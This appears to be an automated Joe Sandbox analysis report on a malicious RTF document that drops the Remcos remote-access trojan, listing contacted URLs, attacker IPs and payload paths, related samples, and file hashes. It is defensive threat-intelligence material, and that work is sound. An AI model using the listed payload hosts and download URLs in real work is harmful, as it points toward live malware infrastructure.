                                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvB7EA.tmp.11.drfalse
                                          unknown
                                          http://107.172.130.147powershell.exe, 00000008.00000002.369656883.00000000027A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://ocsp.entrust.net03powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvB7EA.tmp.11.drfalse
                                              unknown
                                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvB7EA.tmp.11.drfalse
                                                unknown
                                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvB7EA.tmp.11.drfalse
                                                    unknown
                                                    http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvB7EA.tmp.11.drfalse
                                                      unknown
                                                      http://www.nirsoft.netRegAsm.exe, 0000000B.00000002.383461474.0000000000383000.00000004.00000010.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://deff.nelreports.net/api/report?cat=msnbhvB7EA.tmp.11.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvB7EA.tmp.11.drfalse
                                                          unknown
                                                          http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIFjEQNEDT32.EXE, 00000002.00000002.352057257.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://go.microspowershell.exe, 00000008.00000002.369656883.000000000286C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              unknown
                                                              http://cache.btrll.com/default/Pix-1x1.gifbhvB7EA.tmp.11.drfalse
                                                                unknown
                                                                http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvB7EA.tmp.11.drfalse
                                                                  unknown
                                                                  https://www.google.comRegAsm.exe, RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://o.aolcdn.com/ads/adswrappermsni.jsbhvB7EA.tmp.11.drfalse
                                                                      unknown
                                                                      http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvB7EA.tmp.11.drfalse
                                                                        unknown
                                                                        http://www.msn.com/?ocid=iehpbhvB7EA.tmp.11.drfalse
                                                                          unknown
                                                                          https://contoso.com/powershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvB7EA.tmp.11.drfalse
                                                                            unknown
                                                                            http://static.chartbeat.com/js/chartbeat.jsbhvB7EA.tmp.11.drfalse
                                                                              unknown
                                                                              http://www.msn.com/de-de/?ocid=iehpbhvB7EA.tmp.11.drfalse
                                                                                unknown
                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvB7EA.tmp.11.drfalse
                                                                                  unknown
                                                                                  https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://www.nirsoft.net/RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://ocsp.entrust.net0Dpowershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.376237655.000000000255F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.369656883.0000000002511000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvB7EA.tmp.11.drfalse
                                                                                      unknown
                                                                                      http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvB7EA.tmp.11.drfalse
                                                                                        unknown
                                                                                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvB7EA.tmp.11.drfalse
                                                                                          unknown
                                                                                          https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvB7EA.tmp.11.drfalse
                                                                                            unknown
                                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvB7EA.tmp.11.drfalse
                                                                                              unknown
                                                                                              http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvB7EA.tmp.11.drfalse
                                                                                                unknown
                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://www.ccleaner.com/go/app_cc_pro_trialkeybhvB7EA.tmp.11.drfalse
                                                                                                  unknown
                                                                                                  http://crl.entrust.net/server1.crl0powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://contextual.media.net/8/nrrV73987.jsbhvB7EA.tmp.11.drfalse
                                                                                                    unknown
                                                                                                    http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.381268650.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://contextual.media.net/bhvB7EA.tmp.11.drfalse
                                                                                                      unknown
                                                                                                      http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvB7EA.tmp.11.drfalse
                                                                                                        unknown
                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvB7EA.tmp.11.drfalse
                                                                                                          unknown
                                                                                                          http://www.msn.com/bhvB7EA.tmp.11.drfalse
                                                                                                            unknown
                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvB7EA.tmp.11.drfalse
                                                                                                              unknown
                                                                                                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIFGEQNEDT32.EXE, 00000002.00000002.352057257.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvB7EA.tmp.11.drfalse
                                                                                                                    unknown
                                                                                                                    https://raw.githubusercontent.compowershell.exe, 00000008.00000002.369656883.000000000264A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://cdn.at.atwola.com/_media/uac/msn.htmlbhvB7EA.tmp.11.drfalse
                                                                                                                        unknown
                                                                                                                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                          unknown
                                                                                                                          http://107.172.130.147/240/nicepciturewithggreatethingstobe.tIFWEQNEDT32.EXE, 00000002.00000002.352057257.000000000059F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvB7EA.tmp.11.drfalse
                                                                                                                              unknown
                                                                                                                              https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://policies.yahoo.com/w3c/p3p.xmlbhvB7EA.tmp.11.drfalse
                                                                                                                                unknown
                                                                                                                                http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.372607566.000000000512F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.msn.com/advertisement.ad.jsbhvB7EA.tmp.11.drfalse
                                                                                                                                  unknown
                                                                                                                                  http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000D.00000002.380858282.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs
                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  185.199.109.133
                                                                                                                                  raw.githubusercontent.comNetherlands
                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                  185.236.203.101
                                                                                                                                  dumboi.duckdns.orgRomania
                                                                                                                                  9009M247GBtrue
                                                                                                                                  107.172.130.147
                                                                                                                                  unknownUnited States
                                                                                                                                  36352AS-COLOCROSSINGUStrue
                                                                                                                                  178.237.33.50
                                                                                                                                  geoplugin.netNetherlands
                                                                                                                                  8455ATOM86-ASATOM86NLfalse
                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1526390
                                                                                                                                  Start date and time:2024-10-05 14:51:57 +02:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 9m 52s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                  Number of analysed new started processes analysed:18
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:DSpWOKW7zn.rtf
                                                                                                                                  renamed because original name is a hash value
                                                                                                                                  Original Sample Name:26595ba1951c5b5b9b8a328be0d93f1c.rtf
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winRTF@17/19@3/4
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 71.4%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                  • Number of executed functions: 178
                                                                                                                                  • Number of non-executed functions: 265
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .rtf
                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                  • Attach to Office via COM
                                                                                                                                  • Active ActiveX Object
                                                                                                                                  • Scroll down
                                                                                                                                  • Close Viewer
                                                                                                                                  • Override analysis time to 78875.2521079561 for current running targets taking high CPU consumption
                                                                                                                                  • Override analysis time to 157750.504215912 for current running targets taking high CPU consumption
                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 3368 because there are no executed function
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 3580 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                  • VT rate limit hit for: DSpWOKW7zn.rtf
                                                                                                                                  TimeTypeDescription
                                                                                                                                  08:52:45API Interceptor290x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                  08:52:48API Interceptor18x Sleep call for process: wscript.exe modified
                                                                                                                                  08:52:49API Interceptor104x Sleep call for process: powershell.exe modified
                                                                                                                                  08:52:56API Interceptor10555779x Sleep call for process: RegAsm.exe modified
                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                  SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                  • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                                  185.236.203.101Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      107.172.130.147Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 107.172.130.147/240/NNCCE.txt
                                                                                                                                      2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 107.172.130.147/500/RSSTT.txt
                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                                                                      • 107.172.130.147/460/LKiGG.txt
                                                                                                                                      AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                                                                                                                      • 107.172.130.147/460/LKiGG.txt
                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 107.172.130.147/500/RSSTT.txt
                                                                                                                                      178.237.33.501728080706a248a4f632b137f140bbdefdc6243fcfee4f77d8efc81faca52425088e5ea1dc575.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                      • geoplugin.net/json.gp
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      raw.githubusercontent.comIpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.110.133
                                                                                                                                      Bootstrapper V1.19.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                                                                                                      • 185.199.111.133
                                                                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.111.133
                                                                                                                                      GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.108.133
                                                                                                                                      Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.110.133
                                                                                                                                      SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.110.133
                                                                                                                                      PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.111.133
                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.108.133
                                                                                                                                      dumboi.duckdns.orgFormularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.236.203.101
                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.236.203.101
                                                                                                                                      geoplugin.net1728080706a248a4f632b137f140bbdefdc6243fcfee4f77d8efc81faca52425088e5ea1dc575.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      FASTLYUSWindows PowerShell.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.111.133
                                                                                                                                      IpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                                                                      • 199.232.196.209
                                                                                                                                      bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                      • 151.101.2.49
                                                                                                                                      8QBpLkbY6i.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                      • 185.199.110.133
                                                                                                                                      https://cedars-sinai-enterprise.dicomgrid.com/worklist/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 151.101.129.140
                                                                                                                                      [MALICIOUS]_Secured_Doc-[yBv-26104].pdfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 151.101.2.137
                                                                                                                                      https://clicktracking.yellowbook.com/trackingenginewebapp/tracking.html?MB_ID=256862&SE_ID=9&AG_ID=2952701&AD_ID=6851395&kw=restaurants%20near%20me&kw_type=p&C_ID=874339&SE_AD_ID=73873744870314&se_clk_id=0651300f23401ca1b2e355991fb49377&hibu_site=0&redirect_url=https://www.keybag.nl/image/arull.php?7120797967704b5369323074645079557a504c456e4d53532f4b7a79394c4c556c4e7a73684d7a64644c7a732f564b386a524c366b494364454841413d3dmaggie@proctorlane.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 151.101.66.137
                                                                                                                                      survey.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                                      • 199.232.192.193
                                                                                                                                      https://href.li/?https://CYT.sprenumen.ru/wJPIeL/#I#Ws-amclean@lwsd.orgGet hashmaliciousTycoon2FABrowse
                                                                                                                                      • 151.101.2.137
                                                                                                                                      M247GB81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 82.102.27.163
                                                                                                                                      file.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                      • 193.109.85.31
                                                                                                                                      bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                      • 91.202.233.141
                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.236.203.101
                                                                                                                                      http://toomdexter.kindofx.com/c/2734/14-13347393/2/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 5.183.103.118
                                                                                                                                      8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 89.238.176.21
                                                                                                                                      nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                      • 91.202.233.158
                                                                                                                                      novo.arm64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                      • 38.202.249.53
                                                                                                                                      novo.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                      • 38.95.109.126
                                                                                                                                      yakov.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                      • 172.102.214.23
                                                                                                                                      ATOM86-ASATOM86NL1728080706a248a4f632b137f140bbdefdc6243fcfee4f77d8efc81faca52425088e5ea1dc575.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      8cpJOWLf79.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      A&CMetrology_10002099678.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      file.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                      • 178.237.33.50
                                                                                                                                      AS-COLOCROSSINGUSIpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 192.3.220.20
                                                                                                                                      https://extensivetraders.org/Get hashmaliciousUnknownBrowse
                                                                                                                                      • 75.127.1.122
                                                                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 192.3.220.20
                                                                                                                                      Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 107.172.148.201
                                                                                                                                      PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 192.3.220.20
                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 107.172.130.147
                                                                                                                                      TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 172.245.123.6
                                                                                                                                      CxVokk1Xp2.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      • 107.175.130.20
                                                                                                                                      UfsYHroDY1.rtfGet hashmaliciousFormBookBrowse
                                                                                                                                      • 104.168.7.36
                                                                                                                                      QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.168.7.7
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      05af1f5ca1b87cc9cc9b25185115607dIpEmBW3Qw5.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      PO-070-2024 EXW.docxGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      DHL Shipment Doc's.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      GEJMING DUO USD 20241002144902.docx.docGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      Swift Copy.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      PO-00536.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      TTXAPPLICATION.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 185.199.109.133
                                                                                                                                      No context
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):292
                                                                                                                                      Entropy (8bit):3.51210354583792
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6lJQal4E55YcIeeDAlOWAWrlSrHSNombQDgQB:6lJ2Ehec0WhrITykgM
                                                                                                                                      MD5:DD916D7903926C532DA1F2A62C6EE342
                                                                                                                                      SHA1:DA5FF1578B80F29351035C47E6D17E3F246EEBEA
                                                                                                                                      SHA-256:3376C620BEE96F7126D4E72A0AFFA21635593606C1330F5B8BD0DF05C90F4751
                                                                                                                                      SHA-512:AFFC65E209ADF9E0111E3B00E4DB12DBC40958F7D8FCFCC49E4616783F2BF965D6CE68294D1CAB617CBF5AEA175789FA87A66E287DD21D98428B5F5898BF0F95
                                                                                                                                      Malicious:true
                                                                                                                                      Yara Hits:
                                                                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                      Reputation:low
